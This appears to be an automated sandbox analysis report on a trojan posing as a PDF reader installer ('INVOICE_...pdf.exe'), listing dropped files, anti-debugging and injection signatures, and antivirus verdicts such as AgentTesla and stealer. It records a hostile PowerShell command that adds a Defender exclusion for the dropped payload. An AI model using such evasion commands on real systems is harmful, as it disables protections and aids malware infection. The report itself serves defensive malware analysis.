IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x752b72ed
RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x752aab0d
GetIUriPriv2+0x603 CoInternetIsFeatureEnabledForIUri-0xdf6 urlmon+0x1ea98 @ 0x752aea98
RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x752a87f7
CopyStgMedium+0x286 FindMediaType-0x70d urlmon+0x1ba32 @ 0x752aba32
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x76be62fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x76be6d3a
CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x76be77c4
DispatchMessageA+0xf GetMessageA-0x9 user32+0x17bca @ 0x76be7bca
CreateAsyncBindCtx+0xb2f URLDownloadToCacheFileW-0x54c urlmon+0x4516f @ 0x752d516f
CreateAsyncBindCtx+0xa8e URLDownloadToCacheFileW-0x5ed urlmon+0x450ce @ 0x752d50ce
RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x752aa0d8
RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x752a9b85
RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x752a9aa8
CreateAsyncBindCtx+0xccc URLDownloadToCacheFileW-0x3af urlmon+0x4530c @ 0x752d530c
URLDownloadToCacheFileW+0xe5 CoInternetIsFeatureZoneElevationEnabled-0x2c18 urlmon+0x457a0 @ 0x752d57a0
DllCanUnloadNow+0xcfc8 IEAssociateThreadWithTab-0x294dd ieframe+0x2540c @ 0x6c40540c
DllCanUnloadNow+0xce86 IEAssociateThreadWithTab-0x2961f ieframe+0x252ca @ 0x6c4052ca
CreateExtensionGuidEnumerator+0x5d622 SetQueryNetSessionCount-0x15f9a ieframe+0x100ea3 @ 0x6c4e0ea3
RtlGetUserInfoHeap+0x225 RtlQueueWorkItem-0x210 ntdll+0x67e96 @ 0x776a7e96
TpCallbackIndependent+0x527 RtlIsCriticalSectionLockedByThread-0x240 ntdll+0x454f4 @ 0x776854f4
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x760cb727
registers.esp: 79158216
registers.edi: 1988295184
registers.eax: 79158216
registers.ebp: 79158296
registers.edx: 1
registers.ebx: 6246028
registers.esi: 2147746133
registers.ecx: 3931816420

Creates executable files on the filesystem (6 events)

file	C:\Users\Public\Desktop\Slim PDF Reader 2.0.lnk
file	C:\Users\test22\AppData\Local\Temp\64fa8e26-afcb-4883-8b36-883ae60b673d\039316b4-c027-429a-95a4-9762f98f495a.exe
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Slim PDF Reader\Slim PDF Reader 2.0.lnk
file	C:\Users\test22\AppData\Local\Temp\123.exe
file	C:\Users\test22\AppData\Local\Temp\installerpdf.exe
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Slim PDF Reader\Uninstall Slim PDF Reader 2.0.lnk

Creates a shortcut to an executable file (4 events)

file	C:\Users\Public\Desktop\Slim PDF Reader 2.0.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Slim PDF Reader\Slim PDF Reader 2.0.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Slim PDF Reader\Uninstall Slim PDF Reader 2.0.lnk
file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline	powershell Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\123.exe" -Force
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\123.exe" -Force

Drops a binary and executes it (3 events)

file	C:\Users\test22\AppData\Local\Temp\123.exe
file	C:\Users\test22\AppData\Local\Temp\installerpdf.exe
file	C:\Users\test22\AppData\Local\Temp\64fa8e26-afcb-4883-8b36-883ae60b673d\039316b4-c027-429a-95a4-9762f98f495a.exe

Drops an executable to the user AppData folder (4 events)

file	C:\Users\test22\AppData\Local\Temp\123.exe
file	C:\Users\test22\AppData\Local\Temp\64fa8e26-afcb-4883-8b36-883ae60b673d\039316b4-c027-429a-95a4-9762f98f495a.exe
file	C:\Users\test22\AppData\Local\Temp\installerpdf.exe
file	C:\Users\test22\AppData\Local\Temp\is-J90CH.tmp\installerpdf.tmp

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW Dec. 20, 2021, 2:59 p.m.	show_type: 0 filepath_r: powershell parameters: Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\123.exe" -Force filepath: powershell	1	1	0
ShellExecuteExW Dec. 20, 2021, 2:59 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\64fa8e26-afcb-4883-8b36-883ae60b673d\039316b4-c027-429a-95a4-9762f98f495a.exe parameters: /EXEFilename "C:\Users\test22\AppData\Local\Temp\123.exe" /WindowState ""1"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run filepath: C:\Users\test22\AppData\Local\Temp\64fa8e26-afcb-4883-8b36-883ae60b673d\039316b4-c027-429a-95a4-9762f98f495a.exe	1	1	0

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (13 events)

Time & API	Arguments	Status	Return
Process32NextW Dec. 20, 2021, 2:59 p.m.	snapshot_handle: 0x00000108 process_name: taskhost.exe process_identifier: 2600	1	1
Process32NextW Dec. 20, 2021, 2:59 p.m.	snapshot_handle: 0x00000108 process_name: SearchProtocolHost.exe process_identifier: 2696	1	1
Process32NextW Dec. 20, 2021, 2:59 p.m.	snapshot_handle: 0x00000108 process_name: 123.exe process_identifier: 2936	1	1
Process32NextW Dec. 20, 2021, 2:59 p.m.	snapshot_handle: 0x00000108 process_name: installerpdf.exe process_identifier: 2988	1	1
Process32NextW Dec. 20, 2021, 2:59 p.m.	snapshot_handle: 0x00000108 process_name: installerpdf.tmp process_identifier: 3048	1	1
Process32NextW Dec. 20, 2021, 2:59 p.m.	snapshot_handle: 0x00000108 process_name: conhost.exe process_identifier: 2024	1	1
Process32NextW Dec. 20, 2021, 2:59 p.m.	snapshot_handle: 0x00000108 process_name: 039316b4-c027-429a-95a4-9762f98f495a.exe process_identifier: 2184	1	1
Process32NextW Dec. 20, 2021, 2:59 p.m.	snapshot_handle: 0x00000108 process_name: TrustedInstaller.exe process_identifier: 2240	1	1
Process32NextW Dec. 20, 2021, 3 p.m.	snapshot_handle: 0x0000029c process_name: jsc.exe process_identifier: 2140	1	1
Process32NextW Dec. 20, 2021, 3 p.m.	snapshot_handle: 0x0000029c process_name: WmiPrvSE.exe process_identifier: 1948	1	1
Process32NextW Dec. 20, 2021, 3 p.m.	snapshot_handle: 0x0000029c process_name: SlimPDFReader.exe process_identifier: 2544	1	1
Process32NextW Dec. 20, 2021, 3 p.m.	snapshot_handle: 0x0000029c process_name: iexplore.exe process_identifier: 2840	1	1
Process32NextW Dec. 20, 2021, 3 p.m.	snapshot_handle: 0x0000029c process_name: splwow64.exe process_identifier: 2824	1	1

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Dec. 20, 2021, 3 p.m.	process_identifier: 2152 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x03490000 process_handle: 0xffffffff	1	0	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Dec. 20, 2021, 3 p.m.	flags: 15 family: 0		111	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Dec. 20, 2021, 2:59 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW Dec. 20, 2021, 2:59 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (8 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Queries for potentially installed applications (4 events)

Time & API	Arguments	Return
RegOpenKeyExW Dec. 20, 2021, 2:59 p.m.	regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\{B1EC64E0-FE39-45C4-B841-F74EAC175DA5}_is1 base_handle: 0x80000002 key_handle: 0x00000000 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\{B1EC64E0-FE39-45C4-B841-F74EAC175DA5}_is1	2
RegOpenKeyExW Dec. 20, 2021, 2:59 p.m.	regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\{B1EC64E0-FE39-45C4-B841-F74EAC175DA5}_is1 base_handle: 0x80000002 key_handle: 0x00000000 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\{B1EC64E0-FE39-45C4-B841-F74EAC175DA5}_is1	2
RegOpenKeyExW Dec. 20, 2021, 2:59 p.m.	regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\{B1EC64E0-FE39-45C4-B841-F74EAC175DA5}_is1 base_handle: 0x80000001 key_handle: 0x00000000 options: 0 access: 0x00000001 regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\{B1EC64E0-FE39-45C4-B841-F74EAC175DA5}_is1	2
RegOpenKeyExW Dec. 20, 2021, 2:59 p.m.	regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\{B1EC64E0-FE39-45C4-B841-F74EAC175DA5}_is1 base_handle: 0x80000002 key_handle: 0x00000000 options: 0 access: 0x00000101 regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\{B1EC64E0-FE39-45C4-B841-F74EAC175DA5}_is1	2

Uses Windows utilities for basic Windows functionality (4 events)

cmdline	"C:\Users\test22\AppData\Local\Temp\64fa8e26-afcb-4883-8b36-883ae60b673d\039316b4-c027-429a-95a4-9762f98f495a.exe" /EXEFilename "C:\Users\test22\AppData\Local\Temp\123.exe" /WindowState ""1"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
cmdline	C:\Users\test22\AppData\Local\Temp\64fa8e26-afcb-4883-8b36-883ae60b673d\039316b4-c027-429a-95a4-9762f98f495a.exe /EXEFilename "C:\Users\test22\AppData\Local\Temp\123.exe" /WindowState ""1"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
cmdline	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2840 CREDAT:145409
cmdline	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome

Communicates with host for which no DNS query was performed (1 event)

host

117.18.232.200

Deletes executed files from disk (1 event)

file	C:\Users\test22\AppData\Local\Temp\is-J90CH.tmp\installerpdf.tmp

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2840 resumed a thread in remote process 2152
NtResumeThread Dec. 20, 2021, 3 p.m.	thread_handle: 0x0000030c suspend_count: 1 process_identifier: 2152	1	0	0

The process powershell.exe wrote an executable file to disk (20 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

Creates known Upatre files, registry keys and/or mutexes (1 event)

file	C:\Users\test22\AppData\Local\Temp\INVOICE_64645686826464874949653635373637363736276363726376.pdf.exe

File has been identified by 43 AntiVirus engines on VirusTotal as malicious (43 events)

Bkav	W32.AIDetect.malware2
Lionic	Trojan.Win32.NanoBot.trQD
DrWeb	Trojan.MulDrop19.2126
MicroWorld-eScan	Trojan.GenericKD.38096088
FireEye	Generic.mg.28513ec46760b0cc
ALYac	Trojan.GenericKD.38096088
Cylance	Unsafe
Sangfor	Spyware.MSIL.Stealer.chf
CrowdStrike	win/malicious_confidence_100% (W)
Alibaba	TrojanSpy:MSIL/Stealer.cbbe96e4
K7GW	Trojan ( 0058a44a1 )
K7AntiVirus	Trojan ( 0058a44a1 )
Cyren	W32/Trojan.GVC.gen!Eldorado
Symantec	Trojan.Gen.2
ESET-NOD32	a variant of MSIL/Kryptik.ADMR
Paloalto	generic.ml
Kaspersky	Trojan-Spy.MSIL.Stealer.chf
BitDefender	Trojan.GenericKD.38096088
Avast	Win32:Trojan-gen
Ad-Aware	Trojan.GenericKD.38096088
Sophos	Mal/Generic-S
Comodo	TrojWare.Win32.Agent.deraa@0
TrendMicro	TROJ_GEN.R002C0WKN21
McAfee-GW-Edition	BehavesLike.Win32.Generic.wc
Emsisoft	Trojan.GenericKD.38096088 (B)
Avira	TR/Kryptik.epqtq
Antiy-AVL	Trojan/Generic.ASMalwS.34D7AD3
Kingsoft	Win32.Troj.Undef.(kcloud)
Gridinsoft	Trojan.Win32.Kryptik.dd!n
Microsoft	Trojan:MSIL/AgentTesla.LPI!MTB
GData	Trojan.GenericKD.38096088
AhnLab-V3	Malware/Gen.Reputation.C4311550
McAfee	Artemis!28513EC46760
MAX	malware (ai score=94)
VBA32	TrojanSpy.MSIL.Stealer
Malwarebytes	Trojan.Injector
TrendMicro-HouseCall	TROJ_GEN.R002H0DKK21
Tencent	Msil.Trojan.Kryptik.Hqvh
Yandex	Trojan.Kryptik!nrC7vjBMoIU
Fortinet	MSIL/Kryptik.ADMR!tr
AVG	Win32:Trojan-gen
Cybereason	malicious.5995f7
Panda	Trj/CI.A

INVOICE_64645686826464874949653635373637363736276363726376.pdf.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All